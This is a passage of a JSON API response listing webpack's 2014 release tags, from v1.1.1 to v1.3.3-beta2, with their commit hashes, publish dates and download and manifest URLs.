ull,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/ta